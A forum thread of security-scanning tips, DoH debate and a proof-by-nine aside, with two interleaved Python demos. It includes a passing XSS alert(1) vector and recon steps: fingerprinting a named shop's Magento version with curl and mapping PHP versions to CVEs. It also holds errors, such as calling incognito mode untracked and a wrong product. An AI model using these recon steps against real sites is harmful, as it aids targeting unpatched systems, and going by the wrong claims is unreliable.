But "DNS queries for the A and AAAA records for the domain “use-application-dns.net” must respond with NXDOMAIN rather than the IP address retrieved from the authoritative nameserver".

Mozilla just thinks to comply with the following contract: In the US, Firefox by default directs DoH queries to DNS servers that are operated by CloudFlare, meaning that CloudFlare has the ability to see users' queries. Mozilla has a strong Trusted Recursive Resolver (TRR) policy in place that forbids CloudFlare or any other DoH partner from collecting personal identifying information.
To mitigate this risk, our partners are contractually bound to adhere to this policy. (does not just only apply to Cloudflare's)
Source: https://support.mozilla.org/en-US/kb/firefox-dns-over-https

Whenever you are used to non-existing Interwebz privacy this is not a big thing; remember only that it only furthers the monopoly status of the big players, like we have Google, CloudFlare.

So again less to choose from, or use: Intra — an Android application by Jigsaw to route your DNS queries to a DNS-over-HTTPS server of your choice, re: https://play.google.com/store/apps/details?id=app.intra

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
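The canary rule quoted above (NXDOMAIN for use-application-dns.net turns DoH off) is easier to reason about with the actual messages in hand. Here is an added example, my own code and not Firefox's or Mozilla's, that builds the DNS wire-format query a DoH client sends, encodes it the way RFC 8484 GET requests carry it, reads the response code out of a reply and applies the canary rule to the A and AAAA answers. The resolver replies are constructed with a helper, so it runs offline; the "both must be NXDOMAIN" reading follows the quoted sentence and is my assumption about how a client would apply it.

```python
import base64
import struct

CANARY = "use-application-dns.net"
QTYPE_A, QTYPE_AAAA = 1, 28
NXDOMAIN = 3


def build_query(name: str, qtype: int = QTYPE_A, txid: int = 0) -> bytes:
    """Wire-format DNS query (RFC 1035): 12-byte header, QNAME labels, QTYPE, QCLASS.
    RFC 8484 suggests ID 0 for DoH so identical queries are cache-friendly."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # flags: RD only
    qname = b"".join(bytes([len(label)]) + label.encode("ascii")
                     for label in name.rstrip(".").split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", qtype, 1)  # QCLASS IN


def doh_get_path(query: bytes) -> str:
    """RFC 8484 GET form: the query as unpadded base64url in the 'dns' parameter."""
    return "/dns-query?dns=" + base64.urlsafe_b64encode(query).rstrip(b"=").decode("ascii")


def decode_doh_path(path: str) -> bytes:
    """Inverse of doh_get_path (restores the padding base64 needs)."""
    data = path.split("dns=", 1)[1]
    return base64.urlsafe_b64decode(data + "=" * (-len(data) % 4))


def rcode(response: bytes) -> int:
    """The response code is the low four bits of the flags word (bytes 2-3)."""
    return struct.unpack("!H", response[2:4])[0] & 0x0F


def fake_response(query: bytes, code: int) -> bytes:
    """Constructed resolver reply with no answer records: echo the question,
    set QR and RA, and put the requested RCODE in the flags."""
    flags = struct.pack("!H", 0x8180 | code)  # QR=1, RD=1, RA=1
    return query[:2] + flags + query[4:]


def network_opts_out_of_doh(a_reply: bytes, aaaa_reply: bytes) -> bool:
    """The canary rule quoted above: NXDOMAIN for both the A and the AAAA query
    of use-application-dns.net from the local resolver signals 'no DoH here'."""
    return rcode(a_reply) == NXDOMAIN and rcode(aaaa_reply) == NXDOMAIN


if __name__ == "__main__":
    q_a = build_query(CANARY, QTYPE_A)
    q_aaaa = build_query(CANARY, QTYPE_AAAA)
    print("GET", doh_get_path(q_a))
    # a network whose resolver publishes the canary as NXDOMAIN
    print("opt-out:", network_opts_out_of_doh(fake_response(q_a, NXDOMAIN),
                                              fake_response(q_aaaa, NXDOMAIN)))
    # a network that answers normally (NOERROR)
    print("opt-out:", network_opts_out_of_doh(fake_response(q_a, 0),
                                              fake_response(q_aaaa, 0)))
```

Two things the bytes make obvious: the canary check itself goes over plain port 53 to the network's resolver, so anyone on that path can answer it, and the DoH query that follows is an ordinary HTTPS GET, indistinguishable at the network layer from any other request to that host.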
Title: Re: Tests and other Media topics
Post by: polonus on September 09, 2019, 12:41:44 PM
Several Public DOH servers tested against Mozilla Observatory Scan.

1. https://observatory.mozilla.org/analyze/dns.adguard.com   F-grade status
2. https://observatory.mozilla.org/analyze/dns.google   B- grade status
3. https://observatory.mozilla.org/analyze/cloudflare-dns.com  C- grade status
4. https://observatory.mozilla.org/analyze/dns9.quad9.net  no 200 OK returned, F-grade status
5. https://observatory.mozilla.org/analyze/doh.cleanbrowsing.org  B-grade status
6. https://observatory.mozilla.org/analyze/doh.crypto.sx  D- grade status
7. https://doh-ch.blahdns.com/dns-query  no 200 OK returned, F-grade status
8. https://observatory.mozilla.org/analyze/dns.rubyfish.cn  D+ grade status
9. https://observatory.mozilla.org/analyze/doh.dnswarden.com  no 200 OK returned D+ grade status
10. EU server: https://observatory.mozilla.org/analyze/dns.aaflalo.me  D+ grade status
11.  https://observatory.mozilla.org/analyze/doh.captnemo.in  D- grade status
12. https://observatory.mozilla.org/analyze/rdns.faelix.net  no 200 OK returned, D- status
13. https://observatory.mozilla.org/analyze/doh.armadillodns.net  F-grade status
14. https://observatory.mozilla.org/analyze/doh.netweaver.uk   no 200 OK returned  C- grade status
15. https://observatory.mozilla.org/analyze/jp.tiar.app  has an A+ status

Found at: https://github.com/curl/curl/wiki/DNS-over-HTTPS

From these results it seems that DNSSec Japan is best, A+ status grade,
No Censorship, No Logging, No ECS, supports DNSSEC in Japan,
Nihon iti!  (source credits go to: luntrus)

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on September 09, 2019, 05:08:44 PM
On being fast: https://www.dnsperf.com/#!dns-resolvers
see: https://cloudflare-dns.com/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 29, 2019, 11:37:55 AM
AMP

Why AMP is bad? Read: https://medium.com/@danbuben/why-amp-is-bad-for-your-site-and-for-the-web-e4d060a4ff31

Convert to AMP: https://www.ezoic.com/google-amp-converter/?{lpurl}?utm_source=google&utm_medium=g&utm_term=accelerated%20mobile%20pages&utm_content=228474895894&utm_campaign=755009171&utm_source=google&utm_medium=g&utm_term=accelerated%20mobile%20pages&utm_content=228474895894&utm_campaign=755009171&gclid=EAIaIQobChMI0Zfv49j15AIVTPlRCh2hQAdaEAAYASAAEgL32fD_BwE

Test AMP: https://search.google.com/test/amp

And see in the light of Google's (non-)existing privacy policies: https://www.theregister.co.uk/2019/09/25/google_privacy_wc3/

What is shown often is not known, end-user transparency does not exist or barely,
end-users aren't fully aware of the tracking and data-slurping that is going on all of the time all the time,
and it almost seems end-users rather not know.

There is a rather small percentage of "wokers" to these facts of digital life around. It is all about less user control
on content (fake news), analytics & design, and more advanced Google control.

1. (Most important) Use a VPN or Proxy server.

2. Use an ad blocker.

3. Disable 3rd party cookies.

4. Disable JavaScript or use just what you need to make the webpage function for you (uMatrix)

5. Use a good browser and not the Google Chrome (clone) spyware.
    When using Google Chrome, use it in incognito mode (it does not track you that way).  (info credits: Maelstorm)

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on October 05, 2019, 12:22:49 AM
L.S. Found my topic mentioned here: https://forum.avast.com/index.php?topic=129271.msg1513283#msg1513283
This is at 'google results' here: https://www.virustotal.com/gui/ip-address/217.160.0.127/details
This related to this scan result: https://www.virustotal.com/gui/url/6dd7baf5fafb4b7fab4f3f6d9e6f95b862409a697b4e651af8c0fb7adced5ae3/details
where now 7 engines detect.
Also mentioned at the above google results = https://urlquery.net/report/5c0b87e5-08cf-4f80-9b70-89af08ec9e68
coming from this scan report @ urlquery dot net: https://urlquery.net/report/63564530-782e-4486-8c90-6b86f60b1514
malware detected by fortinet's this index.php uri

pol
Title: Re: Tests and other Media topics
Post by: polonus on October 05, 2019, 12:28:38 PM
The Chrome browser will eventually block all http content on https websites; this is announced from version 81 onwards.
No more injections can then take place into http elements through MITM attacks.

Test here random example: https://observatory.mozilla.org/analyze/meedoeninarnhem.nl

US providers used above mentioned leak to change adverts to their own and add adverts,
it is also a royal way in for fake-news and pop-ups of sorts.

One route is to do this in the browser; another route could be to make websites implement CSP,
Content Security Policy: read: https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP

Good to enable "Tracker SSL" as a browser extension to see how trackers help you protect against for instance NSA snooping.

Another way to check is SSL-check: https://www.jitbit.com/sslcheck/
At these forums, pages that failed to crawl were (error returned from the server):
-https://forum.avast.com/index.php?action=.xml;type=rss - empty response
-https://forum.avast.com/index.php?action=verificationcode;vid=search;rand=8d73f3bbXXXXXXXXXX024b5f69c13817;sound - empty response

Test any website: https://nibbler.silktide.com/  and here: http://www.siteliner.com/

The avast forum report: https://nibbler.silktide.com/en_US/reports/forum.avast.com

Hey, folks, read here and else on the forums, because we have found, that
"Over the past 3 months, this website has experienced a moderate decrease in popularity."  :o

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: Asyn on October 05, 2019, 12:39:50 PM
The avast forum report: https://nibbler.silktide.com/en_US/reports/forum.avast.com

Hey, folks, read here and else on the forums, because we have found, that
"Over the past 3 months, this website has experienced a moderate decrease in popularity."  :o
That's actually a good sign, as this is a support forum, less traffic means less problems. ;)
Title: Re: Tests and other Media topics
Post by: polonus on October 05, 2019, 02:04:38 PM
Hi Asyn,

That is your view. ;D You always see the glass half full, while others are constantly looking at a half-empty glass  ;)

This is not reassuring, how easy it is for authorities to tap fiber-data, the proverbial key under the doormat, see here:
https://www.youtube.com/embed/o_WE6Rg_o5E?autoplay=0&enablejsapi=1&wmode=opaque

A network provider does not have an internal network, think of data-traffic in a back-up procedure between data-centers.  :o
Not a lot of the common public is aware of this situation, and the ease with which surveillance can get at all of our data
or at least the very bulk of it.

polonus
Title: Re: Tests and other Media topics
Post by: Asyn on October 05, 2019, 02:19:08 PM
Unfortunately, I doubt that users are aware/interested... :-\
Title: Re: Tests and other Media topics
Post by: bob3160 on October 05, 2019, 03:45:44 PM
The avast forum report: https://nibbler.silktide.com/en_US/reports/forum.avast.com

Hey, folks, read here and else on the forums, because we have found, that
"Over the past 3 months, this website has experienced a moderate decrease in popularity."  :o
That's actually a good sign, as this is a support forum, less traffic means less problems. ;)
Less traffic could also mean less customers which is not a good thing.
I have noticed a large decrease in traffic on the forum.
Title: Re: Tests and other Media topics
Post by: DavidR on October 05, 2019, 06:08:45 PM
The avast forum report: https://nibbler.silktide.com/en_US/reports/forum.avast.com

Hey, folks, read here and else on the forums, because we have found, that
"Over the past 3 months, this website has experienced a moderate decrease in popularity."  :o
That's actually a good sign, as this is a support forum, less traffic means less problems. ;)

Personally I think this report isn't really designed for the likes (excuse the disgraceful pun) of a support forum and not some commercial enterprise where many of these 'popularity' ratings are pointless.

Quote from: extract
Marketing
How well marketed and popular the website is.
I don't see any relationship to this in a support forum.

Quote from: extract
This website does not appear to be associated with a Twitter account.
So bloody what.

Quote from: extract
Social interest
1.  We did not find any Facebook likes or Google +1s for the 5 pages we tested.
Encourage sharing of your content with social media buttons on articles and pages of your website.
2.  The amount of social activity a website should have depends very much on the type of website, its target audience, and how long it has been in operation.

Boy am I glad there aren't any "Facebook likes or Google +1s"
For me that last quoted sentence confirms my comment that the avast forums don't really lend themselves to this type of analysis.

I don't think that less Popularity actually equates to less traffic.

I would say that some traffic is down (but not all) the viruses and worms sub-forum does seem less active, less people requiring help with infections.  I would say that some traffic is up, those complaining about bugs, ads in the UI, etc.  This isn't a good thing and this isn't something that can be measured in this way.
Title: Re: Tests and other Media topics
Post by: polonus on October 12, 2019, 12:04:50 PM
@DavidR,

Happy, when you are happy, agree with you there  ;)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 12, 2019, 12:18:39 PM
Now brought in by Mozilla, CloudFlare & Google to a browser near you:
DoH = (DNS over HTTPS):

https://observatory.mozilla.org/analyze/doh.cleanbrowsing.org
Mozilla, CloudFlare & Google with DoH versus the rest of the globe,
making it harder for supervision, see the controversy kicked up by UK authorities,
with their usual objection (safety filtering for minors).

I, in my humble opinion, see it as a two-sided sword.

Big Commerce will love it for the obvious reasons, some end-users and/or other organizations may like it far less.

More (in)security through obscurity. Not improved website security,
only better secure connection implementation towards whatever insecure or even criminal sites.
But rogues and criminals will also adopt DoH.  :o

Read: https://www.netsparker.com/blog/web-security/pros-cons-dns-over-https/

Consider: https://observatory.mozilla.org/analyze/doh.cleanbrowsing.org  (B-status).

Conclusion: what is good for Big Money IT core business and gigantic prosperity
is not per se good for the common end-user (their much ignored product)  8)

Free services normally mean you are owned by something or someone,
well, at least with proprietary software that is.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 12, 2019, 06:00:44 PM
Checking on SSL Certificate Abuse: https://sslbl.abuse.ch/ssl-certificates/sha1/e8a9f30e99e3a9f64e32aa375c2b0c2ece06ade7/
See reason for listing: blacklisted because of malware.
On IP: https://www.shodan.io/host/192.99.211.205
On host name: -> -205.211.99.rdns.systems -> https://toolbar.netcraft.com/site_report?url=205.211.99.rdns.systems
VT results on IP -> https://www.virustotal.com/gui/ip-address/192.99.211.205/details
engines to detect -> https://www.virustotal.com/gui/ip-address/192.99.211.205/relations
See: https://mxtoolbox.com/SuperTool.aspx?action=https%3a%2f%2fwindows-wsus-en.com%2f&run=toolpage
& https://observatory.mozilla.org/analyze/windows-wsus-en.com

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 13, 2019, 01:33:33 PM
Various DNS and domain tests:
Test website and connection: https://en.internet.nl/
DNSViz visualization scan: https://dnsviz.net/
DNSSEC validation: https://dnssectest.sidnlabs.nl/
Zonemaster domain check: https://www.zonemaster.net/domain_check

Enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 14, 2019, 10:41:26 PM
Mozilla now protects Firefox against attacks via about:pages:
Read: https://blog.mozilla.org/security/2019/10/14/hardening-firefox-against-injection-attacks/

Now they have introduced CSP re-written code inside the browser. (CSP means Content Security Policy)
Good action by Mozilla's Browser Development Team.

However, how many websites do not have one single CSP implementation enabled?

For the frightening results on the website infrastructure,
look here on the map immuniweb presents: https://www.immuniweb.com/websec/

The browser may now come with further improved security,
but many, many websites still have a long way to go where best security policies are concerned.

Scan websites here:
https://securityheaders.com/?q=&followRedirects=on

For immediate threat risk evaluation results (MiM attacks, sending e-mails fraudulently etc.):
https://webscan.upguard.com/#/

Of course the browser end-user can do something to get better protection,
by (temp) blocking JavaScript etc. via an extension like uMatrix.

Mozilla always had Giorgio Maone's No Script to perform such tasks.

Where JavaScript is concerned, it always is an uneven battle between attacker and those that try to protect against it.
Security protection has to take all sorts of issues into account with a wide protection window;
a malicious hacker just needs a tiny little worm-hole to get through,
in some cases only after the hundredth parameter he tested out.  (info source credits go to luntrus)

So for volunteer 3rd party cold recon website security analysts and website error-hunters it is time to stay vigilant.

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on October 21, 2019, 03:55:13 PM
How to go about strengthening the security of your website?
Some issues to consider.

When you perform a scan here: http://isithacked.com/check/
one should establish that no cloaking is taking place,
meaning the site does not show different code to Google than it does to Googlebot.

Check status codes, they should all be the same.

Are there no spammy looking links?

Any iframes that could be hidden and malicious?

Is your site blacklisted - Reputation Check
PASSED
Google Safe Browse:OK
Spamhaus Check:OK
Abuse CC:OK
Dshield Blocklist:OK
Cisco Talos Blacklist:O

In the case of a WordPress Security Scan we could also get such blacklisting info, as well as info on outdated WordPress software,
outdated plug-ins etc., and info on wrong settings like User Enumeration enabled and Directory Listing enabled.

Also we should check for excessive webserver info proliferation. Check on IP via shodan.io;
you then could also explore server bugs and vulnerabilities given for that particular host/domain IP.
An example on GoDaddy's with vulnerabilities: https://www.shodan.io/host/107.180.57.26
Note: the device may not be impacted by all of these issues. The vulnerabilities are implied based on the software and version.
That is why making your webserver not talk that loud is so important! (Dazzlepod ip scan - DOM-XSS issue scan).


Please retire vulnerable jQuery libraries. Two ways to check: the Retire.JS extension for website developers https://retirejs.github.io/retire.js/
or check here: http://retire.insecurity.today/#!/scan

Another check, for JavaScript errors, with an extension like JavaScript Errors Notifier.
The Web Developer extension gives a complete range of tools - then open Ctrl+Shift+I.
This is for website developers -

Also important to know about security header implementation, check through an extension like RECX Security Analyzer.
Or just scan: https://www.immuniweb.com/websec/  and here: https://observatory.mozilla.org/

Then just generate your CSP: https://www.cspisawesome.com/

It is not good to read for example:
X-Frame-Options header is missing
-2 X-XSS-Protection header is missing
-1 X-Content-Type-Options header is missing

In the next posting we look over other aspects and will go a-linting,

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)


Title: Re: Tests and other Media topics
Post by: polonus on October 21, 2019, 04:28:58 PM
Very nice extended test: https://www.immuniweb.com/websec/?id=PfsziMm1
C+ grade; see the misconfigurations alerted there.

Also important to see the 3rd party content -
compare this to a scan here: https://webcookies.org/cookies/
-> https://webcookies.org/cookies/ww1.samuzar.com/28557040?676320
with a resource insecurely loaded over plaintext HTTP.

Sometimes additional scans should be performed: https://webcookies.org/cookies/pxlgnpgecom-a.akamaihd.net/16643915
See: https://www.shodan.io/host/23.62.7.136 -> https://aw-snap.info/file-viewer/?protocol=not-secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=cHhsZ25wZ3teXW0tfC58a3xtfFtoIy5ue3Q%3D~enc
Quote
PORT    STATE SERVICE VERSION
80/tcp  open  http    AkamaiGHost (Akamai's HTTP Acceleration/Mirror service)
|_http-server-header: AkamaiGHost
|_http-title: Invalid URL
443/tcp open  ssl
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
| tls-nextprotoneg:
|   http/1.1
|_  http/1.0
Dazzlepod info

Also see Netcraft Site Report - risk grade 1 red out of 10:
https://toolbar.netcraft.com/site_report?url=a23-62-7-136.deploy.static.akamaitechnologies.com
Detections for this IP address: https://www.virustotal.com/gui/ip-address/23.62.7.136/relations

Blocked for me by an extension = -dt.gnpge.com  : https://www.virustotal.com/gui/ip-address/23.62.7.136/relations

polonus

Title: Re: Tests and other Media topics
Post by: polonus on October 21, 2019, 10:14:21 PM
Some security linting done here for security issues and recommendations:
https://webhint.io/scanner/d95de77c-34b5-4a24-8a9d-56c2d3247f5a#category-security
https-only -  Site should be served over HTTPS to ensure a better connection.
validation not set: 'set-cookie' header to set 'vsid' doesn't have the 'secure' directive
See why this is important: https://webhint.io/docs/user-guide/hints/hint-validate-set-cookie-header/#why-is-this-important
x-content-type-options: 3 hints - Response should include 'x-content-type-options' header.
SSL-labs - does not support HTTPS-

Site has a critical security risk and is blocked by an extension for me:
https://sitecheck.sucuri.net/results/ww1.samuzar.com - see under links found, see:
https://otx.alienvault.com/indicator/ip/208.91.196.145/  IP, having instant access malware - Trojan.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 26, 2019, 12:09:44 AM
I was reading about these subjects: attack vectors, they are being introduced here: http://www.tecapi.com/public/relative-vulnerability-rating-gui.jsp  and then here: http://www.tecapi.com/public/rvr-view-attack-vector-gui.jsp?antiCsrfToken=null&attackVectorId=10  and see why these attack vectors are critical.

Then I went over an attack vector that was found by fuzzing and only works in Firefox, like
Quote
<!----!> but not in Chrome, and again on the älert(1)" string when I reached here: https://alf.nu/alert1  HTML & JavaScript and you open a real can of worms; not always, but you are sure in for some surprise. You are right in the Win A series of JavaScript challenges.

Are you in for testing, well Polonus does it all the time all of the time: https://alf.nu/Chargen
Combine it with this and learn: https://www.duplichecker.com/url-rewriting-tool.php

Enjoy, my good friends, enjoy,

polonus

Title: Re: Tests and other Media topics
Post by: polonus on October 26, 2019, 02:43:26 PM
You often see me react to WordPress flaws on reported websites in the Virus & Worms section.

Here an example.

How to test for such flaws against your own website: http://evuln.com/tools/sql-encoder/
See where others utterly have failed: https://codecurmudgeon.com/wp/sql-injection-hall-of-shame/
And an example of SQL Injection in a plug-in of the WordPress CMS:
https://securityboulevard.com/2019/04/sql-injection-in-duplicate-page-wordpress-plugin/

A PHP-driven CMS could often mean a can of worms: use a PHP security scanner: http://evuln.com/tools/php-security/
And whenever you decide to use it anyways, use best practices: https://www.cloudways.com/blog/php-security/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 26, 2019, 06:02:24 PM
Now on to something completely different.
Mysticism and numbers.
As a teacher I still learned to check difficult multiplications through the proof by nine.

For the link to the stack and the digital world, see number theory:
https://math.stackexchange.com/questions/1620248/the-nine-rule-proof-example-13-15-28-rightarrow-control-13-15

Also Tesla made his specific observations, especially on the trits 3, 6, 9:
https://blog.world-mysteries.com/science/why-did-tesla-say-that-369-was-the-key-to-the-universe/

Funny, it all goes back even to the days of the Big "Goochems" (the Jewish scientists of Mathematics in the days of Alhambra),
but only with Arabic numbers, not with the Latin equivalents. Earlier they counted with a 72-numeric sequence in Babylon,
to make very intricate extrapolations.
Together with a decimal variant for use on the market, counting the fingers of your two hands (menat is 10, as few people have only four digits). Or taking letters as numbers, aleph = 1, beth = 2 etc.

Now we are entering Quantum days certainly opening further horizons.

polonus aka Damian.

Title: Re: Tests and other Media topics
Post by: DavidR on October 26, 2019, 07:44:09 PM
Well my teacher never taught me that (perhaps I was sleeping) :)
https://en.wikipedia.org/wiki/Casting_out_nines
Title: Re: Tests and other Media topics
Post by: polonus on October 27, 2019, 12:30:53 PM
Hi DavidR,

He probably did not tell you either that Tesla was a very superstitious man, who had a bout of control disorder.
I do not know how common it is for inventors, or artists, to meddle in such magical issues; think of Michelangelo.

Tesla had it all a bit worse than average, where one just double-checks the gas is turned off before leaving the house.
Every person has such remainders of reptile-brain functionality traits.

A teacher would never tell about the proof of nine. They kept it for themselves to quickly check outcomes.

Assume we arrived at the outcome of 491 × 5915 being the number 2.904.365. Through proof by nine we now get 491 mod 9 = 5 via this route: 4+9+1 = 14 → 1+4 = 5, and 5915 mod 9 = 2 via: 5+9+1+5 = 20 → 2+0 = 2, and then accordingly we get (5 × 2) mod 9 = 1, just by adding the digits of the resulting 10. Easy peasy. All Dutch teachers before the Second World War had this at their disposal. It is not being taught anymore.

polonus
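The proof by nine from the post above as a runnable check. This is an added example, not polonus's code: it walks the digit sums of the factors 491 and 5915, tests a claimed product, and shows the known limitation that a digit transposition (an error that is a multiple of 9) still passes.

```python
# Casting out nines ("proof by nine"): an added example, not code from the post.
# The check compares digital roots modulo 9, so it can reject a wrong product
# but can never prove a right one: any error that is a multiple of 9 slips past.


def digital_root(n: int) -> int:
    """Repeatedly add the decimal digits of n until a single digit remains.

    For n > 0 this equals n mod 9, except that multiples of 9 give 9 rather than 0.
    """
    n = abs(n)
    while n > 9:
        n = sum(int(d) for d in str(n))
    return n


def digit_sum_trace(n: int) -> list:
    """The route the post walks by hand, e.g. 491 -> 14 -> 5."""
    trace = [abs(n)]
    while trace[-1] > 9:
        trace.append(sum(int(d) for d in str(trace[-1])))
    return trace


def passes_proof_by_nine(a: int, b: int, claimed: int) -> bool:
    """True when a * b == claimed is consistent with casting out nines.

    The digital root of root(a) * root(b) must equal the digital root of the
    claimed product; if it does not, the multiplication is certainly wrong.
    """
    return digital_root(digital_root(a) * digital_root(b)) == digital_root(claimed)


if __name__ == "__main__":
    a, b = 491, 5915
    print(digit_sum_trace(a), digit_sum_trace(b))  # [491, 14, 5] [5915, 20, 2]
    # The figure quoted in the post, the exact product, and a digit transposition.
    for claimed in (2_904_365, 2_904_265, 2_904_625):
        print(claimed, "check:", passes_proof_by_nine(a, b, claimed), "exact:", claimed == a * b)
```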
Title: Re: Tests and other Media topics
Post by: polonus on October 31, 2019, 05:53:09 PM
Query related links for -www.test.com
-> https://urlscan.io/result/e65e0f58-a981-4b3a-93e8-2a510319a305/#iocs
-> https://www.test.com/
-> https://www.abuseipdb.com/whois/69.172.200.235
voted as malicious: https://www.threatcrowd.org/ip.php?ip=69.172.200.235
Bad Host Appearance: https://www.projecthoneypot.org/ip_69.172.201.153
Re: https://urlquery.net/report/ab015b74-1030-4da7-a7ea-65fa03ba1dd1
Avast Alert:
Ostrzeżenie!
Strona, na którą chcesz wejść, została oznaczona jako strona przechwytująca dane (phishing).

WRÓĆ DO BEZPIECZNEGO MIEJSCA

-> https://www.hybrid-analysis.com/sample/9e7283dfcf72ec7611c3be196760a9aeb214643da2599e95ed7cc624f1cd0772?environmentId=100
-> https://www.sslshopper.com/ssl-checker.html#hostname=test.com
Re: https://performance.sucuri.net/domain/test.com
-> https://www.cyberscan.io/domains/test.com

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 02, 2019, 12:09:53 AM
A still very relevant article: https://www.zdnet.com/article/an-insecure-mess-how-flawed-javascript-is-turning-web-into-a-hackers-playground/

Test: http://research.insecurelabs.org/jquery/test/
For jquery on websites: https://retire.insecurity.today/
and https://dojotoolkit.org/api/?qs=1.8/dojox/validate/web
Test your code: https://snyk.io/test/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 03, 2019, 01:35:09 PM
How to check whether your website lives up to EU cookie regulations?
Disclaimer: The results presented might not be 100 % correct. This tool is meant to be used by site owners as a starting point for improvements, not as a rigorous analysis. 
https://www.cookiemetrix.com/  free analysis of just the homepage of the website,
for a full analysis create an account. (info credits go to Choi)

You could also compare it here with a privacy and security test: random example https://webcookies.org/cookies/media.reklamaizer.ru/2468946  (best checker i.m.h.o.)

Various checkers: https://www.cookiechecker.nl/  &   https://sitechecker.pro/cookie-checker/ 
Another Dutch one: https://www.browserchecker.nl/cookiewet

Interesting: http://www.whatarecookies.com/view.asp
Cleanse your cookies with Cookienator -> -https://cookienator.software.informer.com/2.6/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 07, 2019, 06:05:38 PM
Watch that CMS that is nearing end of service time!

200.000 Magento-webshops without any patches next year for Magento version 1 - no more security updates to come.
So with that CMS urgent advice is to change to Magento 2 (but that upgrade is not an easy one, so start now).

Read: https://hostingtribunal.com/blog/magento-statistics/
and https://trends.builtwith.com/websitelist/Magento
and https://w3techs.com/technologies/details/cm-magento/all/all

If you want to avoid Magento webshops that did not perform the upgrade to version 2,
then one could find out the version (only when settings allow).
By putting /magento_version behind the domain address.
Example:
$ curl https://www.horecaxl.com/magento_version
Magento/2.1 (Community)
Or scan at shodan.io for instance.

Another method is to scan with the tool available from here: https://whatcms.org/

polonus (volunteer 3rd party cold recon security website analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on November 08, 2019, 10:36:50 PM
Here an example of a website still on Magento 1

Scanner of choice: https://www.magereport.com/scan/?s=https://www.shopdutyfree.com/

39 recommendations found through linting: https://webhint.io/scanner/13bf4595-6f35-4107-bdf3-807df5f7cdff
of which following are security related: https://webhint.io/scanner/13bf4595-6f35-4107-bdf3-807df5f7cdff#category-security

Security check for immediate threats: https://webscan.upguard.com/#/https://www.shopdutyfree.com/  (10 detected)
34 checks passed.

Site issue: https://sitecheck.sucuri.net/results/www.shopdutyfree.com

DOM-XSS flaws: Results from scanning URL: -https://www.shopdutyfree.com
Number of sources found: 28
Number of sinks found: 257

Results from scanning URL:
-https://www.shopdutyfree.com/static/version1572656038/_cache/merged/0e2010fc837637e2d987804478c1f47e.min.js
Number of sources found: 34
Number of sinks found: 14

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on November 11, 2019, 01:03:13 PM
Linting is also a form of testing. So I tried to lint a static website built with the Tilda CMS, running on a Qrator server here:
It resulted in 507 recommendations for the website: https://webhint.io/scanner/8be58bd9-04cb-4f5d-8903-1a4fd36aaf5b

DOM-XSS flaws: Results from scanning URL: -https://tilda.cc/ru/
Number of sources found: 7
Number of sinks found: 564
&
Results from scanning URL: -https://static.tildacdn.com/js/tilda-menusub-1.0.min.js
Number of sources found: 3
Number of sinks found: 7

Results from scanning URL: -https://use.typekit.net/gwk7uku.js  (external link)
Number of sources found: 5
Number of sinks found: 3

Another site built with Tilda: https://urlscan.io/result/f81ba6bd-10f2-426c-b2d7-06497c76bfae/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 11, 2019, 11:51:19 PM
Searching "network_suricata_alert.description" on Maltiverse,
then later pinpointing detections via VirusTotal IP-relations detections.

What we searched: https://maltiverse.com/search;query=network_suricata_alert.description:%22ET%20INFO%20Suspicious%20HTML%20Decimal%20Obfuscated%20Title%20-%20Possible%20Phishing%20Landing%20Apr%2019%202017%22;page=1;sort=query_score

Where we searched: https://www.virustotal.com/gui/url/c6e7f4508f12cb5c621d1d6a120b153c17352231f251526a089d8e978ce18eb3/details

And eventually what we did find on IP relations:
https://www.virustotal.com/gui/ip-address/80.78.250.103/relations

This phishing was flagged by 13 engines: http://www.nmosina.ru/alibaba/ALIBABA/89b43fb1ee59109c36ecd0929cec07ae

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 13, 2019, 11:59:24 PM
Working over header implementation and quieting other headers to get additional website security layers....

Security header scan: (random example): https://securityheaders.com/?q=http%3A%2F%2Fcraft2cart.com&followRedirects=on
Another one: https://observatory.mozilla.org/analyze/craft2cart.com
of which a header scan is part.
Then we can have results from the security scan on webhint:
where it is also important for certain headers not to talk too loud, or rather not talk at all (PHP version for instance).
136 recommendations security wise: https://webhint.io/scanner/fd0e3451-9d4a-4908-b9e6-25a1ed3c0ec8#category-security
Then inside the browser there is Recx Security Analyser extension.
Re
Quote
HTTP/1.1 200 OK
Wed, 13 Nov 2019 22:35:33 GMT
Apache
PHP/5.6.40
Thu, 19 Nov 1981 08:52:00 GMT
no-store, no-cache, must-revalidate, post-check=0, pre-check=0
no-cache
SAMEORIGIN
frontend=59c02d7a31291f121ab733e852b40f0a; expires=Wed, 13-Nov-2019 23:35:33 GMT; Max-Age=3600; path=/; domain=craft2cart dot com; HttpOnly
chunked
text/html; charset=UTF-8

We see the PHP version here: so we can look this up: https://www.cvedetails.com/vulnerability-list/vendor_id-74/product_id-128/version_id-298516/PHP-PHP-5.6.40.html
So then we will ask this question: https://stackoverflow.com/questions/5777792/what-does-it-mean-to-run-php-in-quiet-mode
which will make it a tad more difficult for either l33t attackers or one-horse-trick script kiddies.

